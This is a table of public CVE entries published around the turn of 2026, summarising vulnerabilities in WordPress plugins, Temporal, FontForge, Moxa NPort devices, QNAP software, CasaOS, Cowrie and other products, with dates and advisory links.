| Unknown--Advance WP Query Search Filter | The Advance WP Query Search Filter WordPress plugin through 1.0.10 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2025-12-30 | not yet calculated | CVE-2025-14312 | https://wpscan.com/vulnerability/f06f982b-108b-4fc1-ad48-2f890a06ecf0/ |
| Unknown--Advance WP Query Search Filter | The Advance WP Query Search Filter WordPress plugin through 1.0.10 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2025-12-30 | not yet calculated | CVE-2025-14313 | https://wpscan.com/vulnerability/5ebcdb32-da82-4129-8538-40d1b03a1108/ |
| Unknown--Ultimate Post Kit Addons for Elementor | The Ultimate Post Kit Addons for Elementor WordPress plugin before 4.0.16 exposes multiple AJAX "load more" endpoints such as upk_alex_grid_loadmore_posts without ensuring that the posts to be displayed are published or that the caller is authenticated. This allows an unauthenticated attacker to query arbitrary posts and retrieve the rendered HTML content of private and unpublished ones. | 2025-12-31 | not yet calculated | CVE-2025-14434 | https://wpscan.com/vulnerability/bf3c3193-fc9c-454b-ad4f-94ba1669a312/ |
| Temporal--Temporal | When frontend.enableExecuteMultiOperation is enabled, the server can apply namespace-scoped validation and feature gates for the embedded StartWorkflowExecutionRequest using its Namespace field rather than the outer, authorized ExecuteMultiOperationRequest.Namespace. This allows a caller authorized for one namespace to bypass that namespace's limits/policies by setting the embedded start request's namespace to a different namespace. The workflow is still created in the outer (authorized) namespace; only validation/gating is performed under the wrong namespace context. This issue affects Temporal: from 1.24.0 through 1.29.1. Fixed in 1.27.4, 1.28.2, 1.29.2. | 2025-12-30 | not yet calculated | CVE-2025-14986 | https://github.com/temporalio/temporal/releases/tag/v1.27.4 https://github.com/temporalio/temporal/releases/tag/v1.28.2 https://github.com/temporalio/temporal/releases/tag/v1.29.2 |
| Temporal--Temporal | When system.enableCrossNamespaceCommands is enabled (on by default), the Temporal server permits certain workflow task commands (e.g. StartChildWorkflowExecution, SignalExternalWorkflowExecution, RequestCancelExternalWorkflowExecution) to target a different namespace than the namespace authorized at the gRPC boundary. The frontend authorizes RespondWorkflowTaskCompleted based on the outer request namespace, but the history service later resolves and executes the command using the namespace embedded in command attributes without authorizing the caller for that target namespace. This can allow a worker authorized for one namespace to create, signal, or cancel workflows in another namespace. This issue affects Temporal: through 1.29.1. Fixed in 1.27.4, 1.28.2, 1.29.2. | 2025-12-30 | not yet calculated | CVE-2025-14987 | https://github.com/temporalio/temporal/releases/tag/v1.27.4 https://github.com/temporalio/temporal/releases/tag/v1.28.2 https://github.com/temporalio/temporal/releases/tag/v1.29.2 |
| Moxa--NPort 5000AI-M12 Series | A vulnerability exists in serial device servers where active debug code remains enabled in the UART interface. An attacker with physical access to the device can directly connect to the UART interface and, without authentication, user interaction, or execution conditions, gain unauthorized access to internal debug functionality. Exploitation is low complexity and allows an attacker to execute privileged operations and access sensitive system resources, resulting in a high impact to the confidentiality, integrity, and availability of the affected device. No security impact to external or dependent systems has been identified. | 2025-12-31 | not yet calculated | CVE-2025-15017 | https://www.moxa.com/en/support/product-support/security-advisory/mpsa-257331-cve-2025-15017-active-debug-code-vulnerability-in-serial-device-servers |
| FontForge--FontForge | FontForge SFD File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SFD files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28564. | 2025-12-31 | not yet calculated | CVE-2025-15269 | ZDI-25-1195 |
| FontForge--FontForge | FontForge SFD File Parsing Improper Validation of Array Index Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SFD files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated array. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28563. | 2025-12-31 | not yet calculated | CVE-2025-15270 | ZDI-25-1194 |
| FontForge--FontForge | FontForge SFD File Parsing Improper Validation of Array Index Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SFD files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated array. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28562. | 2025-12-31 | not yet calculated | CVE-2025-15271 | ZDI-25-1193 |
| FontForge--FontForge | FontForge SFD File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SFD files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28547. | 2025-12-31 | not yet calculated | CVE-2025-15272 | ZDI-25-1192 |
| FontForge--FontForge | FontForge PFB File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PFB files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28546. | 2025-12-31 | not yet calculated | CVE-2025-15273 | ZDI-25-1191 |
| FontForge--FontForge | FontForge SFD File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SFD files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28544. | 2025-12-31 | not yet calculated | CVE-2025-15274 | ZDI-25-1190 |
| FontForge--FontForge | FontForge SFD File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SFD files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28543. | 2025-12-31 | not yet calculated | CVE-2025-15275 | ZDI-25-1189 |
| FontForge--FontForge | FontForge SFD File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SFD files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28198. | 2025-12-31 | not yet calculated | CVE-2025-15276 | ZDI-25-1187 |
| FontForge--FontForge | FontForge GUtils SGI File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of scanlines within SGI files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27920. | 2025-12-31 | not yet calculated | CVE-2025-15277 | ZDI-25-1186 |
| FontForge--FontForge | FontForge GUtils XBM File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of pixels within XBM files. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27865. | 2025-12-31 | not yet calculated | CVE-2025-15278 | ZDI-25-1185 |
| FontForge--FontForge | FontForge GUtils BMP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of pixels within BMP files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27517. | 2025-12-31 | not yet calculated | CVE-2025-15279 | ZDI-25-1184 |
| FontForge--FontForge | FontForge SFD File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SFD files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28525. | 2025-12-31 | not yet calculated | CVE-2025-15280 | ZDI-25-1188 |
| Moxa--NPort 6100-G2/6200-G2 Series | The NPort 6100-G2/6200-G2 Series is affected by an execution with unnecessary privileges vulnerability (CVE-2025-1977) that allows an authenticated user with read-only access to perform unauthorized configuration changes through the MCC (Moxa CLI Configuration) tool. The issue can be exploited remotely over the network with low attack complexity and no user interaction, but requires specific system conditions or configurations to be present. Successful exploitation may result in changes to device settings that were not intended to be permitted for the affected user role, potentially leading to a high impact on the confidentiality, integrity, and availability of the device. No impact on other systems has been identified. | 2025-12-31 | not yet calculated | CVE-2025-1977 | https://www.moxa.com/en/support/product-support/security-advisory/mpsa-251731-cve-2025-1977-cve-2025-2026-multiple-vulnerabilities-in-nport-6100-g2-6200-g2-series |
| Moxa--NPort 6100-G2/6200-G2 Series | The NPort 6100-G2/6200-G2 Series is affected by a high-severity vulnerability (CVE-2025-2026) that allows remote attackers to execute a null byte injection through the device's web API. This may lead to an unexpected device reboot and result in a denial-of-service (DoS) condition. An authenticated remote attacker with web read-only privileges can exploit the vulnerable API to inject malicious input. Successful exploitation may cause the device to reboot, disrupting normal operations and causing a temporary denial of service. | 2025-12-31 | not yet calculated | CVE-2025-2026 | https://www.moxa.com/en/support/product-support/security-advisory/mpsa-251731-cve-2025-1977-cve-2025-2026-multiple-vulnerabilities-in-nport-6100-g2-6200-g2-series |
| IceWhale Tech--CasaOS | CasaOS versions up to and including 0.4.15 expose multiple unauthenticated endpoints that allow remote attackers to retrieve sensitive configuration files and system debug information. The /v1/users/image endpoint can be abused with a user-controlled path parameter to access files under /var/lib/casaos/1/, which reveals installed applications and configuration details. Additionally, /v1/sys/debug discloses host operating system, kernel, hardware, and storage information. The endpoints also return distinct error messages, enabling file existence enumeration of arbitrary paths on the underlying host filesystem. This information disclosure can be used for reconnaissance and to facilitate targeted follow-up attacks against services deployed on the host. | 2026-01-03 | not yet calculated | CVE-2025-34171 | https://casaos.zimaspace.com/ https://github.com/IceWhaleTech/CasaOS https://www.vulncheck.com/advisories/casaos-unauthenticated-file-and-debug-data-exposure |
| fredtempez--ZwiiCMS | ZwiiCMS versions prior to 13.7.00 contain a denial-of-service vulnerability in multiple administrative endpoints due to improper authorization checks combined with flawed resource state management. When an authenticated low-privilege user requests an administrative page, the application returns "404 Not Found" as expected, but incorrectly acquires and associates a temporary lock on the targeted resource with the attacker session prior to authorization. This lock prevents other users, including administrators, from accessing the affected functionality until the attacker navigates away or the session is terminated. | 2025-12-31 | not yet calculated | CVE-2025-34467 | https://github.com/fredtempez/ZwiiCMS https://codeberg.org/fredtempez/ZwiiCMS/releases/tag/13.7.00 https://www.vulncheck.com/advisories/zwiicms-lock-persistence-authenticated-dos-against-administrative-pages |
| libcoap--libcoap | libcoap versions up to and including 4.3.5, prior to commit 30db3ea, contain a stack-based buffer overflow in address resolution when attacker-controlled hostname data is copied into a fixed 256-byte stack buffer without proper bounds checking. A remote attacker can trigger a crash and potentially achieve remote code execution depending on compiler options and runtime memory protections. Exploitation requires the proxy logic to be enabled (i.e., the proxy request handling code path in an application using libcoap). | 2025-12-31 | not yet calculated | CVE-2025-34468 | https://github.com/obgm/libcoap/pull/1737 https://github.com/obgm/libcoap/commit/30db3ea https://libcoap.net/ https://www.vulncheck.com/advisories/libcoap-stack-based-buffer-overflow-in-address-resolution-dos-or-potential-rce |
| Cowrie--Cowrie | Cowrie versions prior to 2.9.0 contain a server-side request forgery (SSRF) vulnerability in the emulated shell implementation of wget and curl. In the default emulated shell configuration, these command emulations perform real outbound HTTP requests to attacker-supplied destinations. Because no outbound request rate limiting was enforced, unauthenticated remote attackers could repeatedly invoke these commands to generate unbounded HTTP traffic toward arbitrary third-party targets, allowing the Cowrie honeypot to be abused as a denial-of-service amplification node and masking the attacker's true source address behind the honeypot's IP. | 2025-12-31 | not yet calculated | CVE-2025-34469 | https://github.com/advisories/GHSA-83jg-m2pm-4jxj https://github.com/cowrie/cowrie/releases/tag/v2.9.0 https://github.com/cowrie/cowrie/pull/2800 https://github.com/cowrie/cowrie/issues/2622 https://www.vulncheck.com/advisories/cowrie-unrestricted-wget-curl-emulation-enables-ssrf-based-ddos-amplification |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.6.3195 build 20250715 and later; QuTS hero h5.2.6.3195 build 20250715 and later | 2026-01-02 | not yet calculated | CVE-2025-44013 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| httpbin--mccutchen | A cross-site scripting (XSS) vulnerability in mccutchen httpbin v2.17.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | 2026-01-02 | not yet calculated | CVE-2025-45286 | https://github.com/mccutchen/go-httpbin/security/advisories/GHSA-528q-4pgm-wvg2 https://github.com/advisories/GHSA-528q-4pgm-wvg2 |
| QNAP Systems Inc.--QTS | An allocation of resources without limits or throttling vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains a user account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource. We have already fixed the vulnerability in the following versions: QTS 5.2.6.3195 build 20250715 and later; QuTS hero h5.2.6.3195 build 20250715 and later | 2026-01-02 | not yet calculated | CVE-2025-47208 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| Apache Software Foundation--Apache StreamPipes | A user with a legitimate non-administrator account can exploit a vulnerability in the user ID creation mechanism in Apache StreamPipes that allows them to swap the username of an existing user with that of an administrator. This vulnerability allows an attacker to gain administrative control over the application by manipulating JWT tokens, which can lead to data tampering, unauthorized access and other security issues. This issue affects Apache StreamPipes: through 0.97.0. Users are recommended to upgrade to version 0.98.0, which fixes the issue. | 2026-01-01 | not yet calculated | CVE-2025-47411 | https://lists.apache.org/thread/lngko4ht2ok3o0rk9h0clgm4kb0lmt36 |
| QNAP Systems Inc.--QTS | A buffer overflow vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following version: QTS 5.2.8.3332 build 20251128 and later | 2026-01-02 | not yet calculated | CVE-2025-48721 | https://www.qnap.com/en/security-advisory/qsa-25-51 |
| Apache Software Foundation--Apache NuttX RTOS | Release of Invalid Pointer or Reference vulnerability was discovered in fs/inode/fs_inoderemove code of the Apache NuttX RTOS that allowed root filesystem inode removal leading to a debug assert trigger (that is disabled by default), NULL pointer dereference (handled differently depending on the target architecture), or in general, a Denial of Service. This issue affects Apache NuttX RTOS: from 10.0.0 before 12.10.0. Users of filesystem based services with write access that were exposed over the network (i.e. FTP) are affected and recommended to upgrade to version 12.10.0 that fixes the issue. | 2026-01-01 | not yet calculated | CVE-2025-48768 | https://github.com/apache/nuttx/pull/16437 https://lists.apache.org/thread/nwo1kd08b7t3dyz082q2pghdxwvxwyvo |
| Apache Software Foundation--Apache NuttX RTOS | A Use After Free vulnerability was discovered in the fs/vfs/fs_rename code of the Apache NuttX RTOS. Due to a recursive implementation and the use of a single buffer by two different pointer variables, it allowed reallocation of a buffer with an arbitrary user-provided size and a write to the previously freed heap chunk, which in specific cases could cause unintended virtual filesystem rename/move operation results. This issue affects Apache NuttX RTOS: from 7.20 before 12.11.0. Users of virtual filesystem based services with write access, especially when exposed over the network (i.e. FTP), are affected and recommended to upgrade to version 12.11.0, which fixes the issue. | 2026-01-01 | not yet calculated | CVE-2025-48769 | https://github.com/apache/nuttx/pull/16455 https://lists.apache.org/thread/7m83v11ldfq7bvw72n9t5sccocczocjn |
| nfields--VarCreateStruct | An issue was discovered in matio 1.5.28. A heap-based memory corruption can occur in Mat_VarCreateStruct() when the nfields value does not match the actual number of strings in the fields array. This leads to out-of-bounds reads and invalid memory frees during cleanup, potentially causing a segmentation fault or heap corruption. | 2025-12-30 | not yet calculated | CVE-2025-50343 | https://github.com/tbeu/matio/issues/275 https://github.com/zakkanijia/POC/blob/main/matio/CVE-2025-50343/matio.md |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later; QuTS hero h5.2.7.3256 build 20250913 and later; QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-52426 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later; QuTS hero h5.2.7.3256 build 20250913 and later; QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-52430 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later; QuTS hero h5.2.7.3256 build 20250913 and later; QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-52431 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A buffer overflow vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later; QuTS hero h5.2.7.3256 build 20250913 and later; QuTS hero h5.3.0.3192 build 20250716 and later | 2026-01-02 | not yet calculated | CVE-2025-52863 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A buffer overflow vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later; QuTS hero h5.2.7.3256 build 20250913 and later; QuTS hero h5.3.0.3192 build 20250716 and later | 2026-01-02 | not yet calculated | CVE-2025-52864 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--License Center | An out-of-bounds read vulnerability has been reported to affect License Center. If a remote attacker gains a user account, they can then exploit the vulnerability to obtain secret data. We have already fixed the vulnerability in the following version: License Center 2.0.36 and later | 2026-01-02 | not yet calculated | CVE-2025-52871 | https://www.qnap.com/en/security-advisory/qsa-25-52 |
| QNAP Systems Inc.--QTS | A buffer overflow vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later; QuTS hero h5.2.7.3256 build 20250913 and later; QuTS hero h5.3.0.3192 build 20250716 and later | 2026-01-02 | not yet calculated | CVE-2025-52872 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later; QuTS hero h5.2.7.3256 build 20250913 and later; QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-53405 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later; QuTS hero h5.2.7.3256 build 20250913 and later; QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-53414 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later; QuTS hero h5.2.7.3256 build 20250913 and later; QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-53589 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following version: QTS 5.2.7.3256 build 20250913 and later | 2026-01-02 | not yet calculated | CVE-2025-53590 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A use of externally-controlled format string vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to obtain secret data or modify memory. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later; QuTS hero h5.2.7.3256 build 20250913 and later; QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-53591 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later; QuTS hero h5.2.7.3256 build 20250913 and later; QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-53592 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A buffer overflow vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later; QuTS hero h5.2.7.3256 build 20250913 and later; QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-53593 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--Qfinder Pro Mac | A path traversal vulnerability has been reported to affect several product versions. If a local attacker gains a user account, they can then exploit the vulnerability to read the contents of unexpected files or system data. We have already fixed the vulnerability in the following versions: Qfinder Pro Mac 7.13.0 and later; Qsync for Mac 5.1.5 and later; QVPN Device Client for Mac 2.2.8 and later | 2026-01-02 | not yet calculated | CVE-2025-53594 | https://www.qnap.com/en/security-advisory/qsa-25-55 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later; QuTS hero h5.2.7.3256 build 20250913 and later; QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-53596 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--License Center | A buffer overflow vulnerability has been reported to affect License Center. If a remote attacker gains an administrator account, they can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following version: License Center 2.0.36 and later | 2026-01-02 | not yet calculated | CVE-2025-53597 | https://www.qnap.com/en/security-advisory/qsa-25-52 |
| QNAP Systems Inc.--QTS | An out-of-bounds read vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to obtain secret data. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later; QuTS hero h5.2.7.3256 build 20250913 and later; QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-54164 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | An out-of-bounds read vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to obtain secret data. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later; QuTS hero h5.2.7.3256 build 20250913 and later; QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-54165 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | An out-of-bounds read vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to obtain secret data. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later; QuTS hero h5.2.7.3256 build 20250913 and later; QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-54166 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| pangolin--fosrl | Authentication Bypass in fosrl/pangolin v1.6.2 and before allows attackers to access Pangolin resources via an Insecure Default Configuration. | 2025-12-30 | not yet calculated | CVE-2025-56332 | https://github.com/fosrl/pangolin https://gist.github.com/mrdgef/ef6fa41d69c0457874414c163d7d7d75 |
| pangolin--fosrl | An issue in Fossorial fosrl/pangolin v1.6.2 and before allows a remote attacker to escalate privileges via the 2FA component. | 2025-12-29 | not yet calculated | CVE-2025-56333 | https://github.com/fosrl/pangolin https://gist.github.com/mrdgef/ef6fa41d69c0457874414c163d7d7d75 |
| machsol--machpanel | A file upload vulnerability in machsol machpanel 8.0.32 allows an attacker to gain a webshell. | 2025-12-29 | not yet calculated | CVE-2025-57460 | https://www.machsol.com/ https://github.com/aljoharasubaie/CVE-2025-57460/blob/main/README.md |
| machsol--machpanel | Stored cross-site scripting (XSS) in machsol machpanel 8.0.32 allows attackers to execute arbitrary web scripts or HTML via a crafted PDF file. | 2025-12-29 | not yet calculated | CVE-2025-57462 | https://www.machsol.com/ https://github.com/aljoharasubaie/CVE-2025-57462/blob/main/README.md |
| QNAP Systems Inc.--QTS | An allocation of resources without limits or throttling vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later; QuTS hero h5.2.7.3256 build 20250913 and later; QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-57705 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A path traversal vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to read the contents of unexpected files or system data. We have already fixed the vulnerability in the following versions: QTS 5.2.8.3332 build 20251128 and later; QuTS hero h5.2.8.3321 build 20251117 and later | 2026-01-02 | not yet calculated | CVE-2025-59380 | https://www.qnap.com/en/security-advisory/qsa-25-51 |
| QNAP Systems Inc.--QTS | A path traversal vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to read the contents of unexpected files or system data. We have already fixed the vulnerability in the following versions: QTS 5.2.8.3332 build 20251128 and later; QuTS hero h5.2.8.3321 build 20251117 and later | 2026-01-02 | not yet calculated | CVE-2025-59381 | https://www.qnap.com/en/security-advisory/qsa-25-51 |
| QNAP Systems Inc.--Qfiling | A path traversal vulnerability has been reported to affect Qfiling. Remote attackers can exploit the vulnerability to read the contents of unexpected files or system data. We have already fixed the vulnerability in the following version: Qfiling 3.13.1 and later | 2026-01-02 | not yet calculated | CVE-2025-59384 | https://www.qnap.com/en/security-advisory/qsa-25-54 |
| QNAP Systems Inc.--MARS (Multi-Application Recovery Service) | An SQL injection vulnerability has been reported to affect MARS (Multi-Application Recovery Service). The remote attackers can then exploit the vulnerability to execute unauthorized code or commands. We have already fixed the vulnerability in the following version: MARS (Multi-Application Recovery Service) 1.2.1.1686 and later | 2026-01-02 | not yet calculated | CVE-2025-59387 | https://www.qnap.com/en/security-advisory/qsa-25-53 |
| QNAP Systems Inc.--Hyper Data Protector | An SQL injection vulnerability has been reported to affect Hyper Data Protector. The remote attackers can then exploit the vulnerability to execute unauthorized code or commands. We have already fixed the vulnerability in the following version: Hyper Data Protector 2.2.4.1 and later | 2026-01-02 | not yet calculated | CVE-2025-59389 | https://www.qnap.com/en/security-advisory/qsa-25-48 |
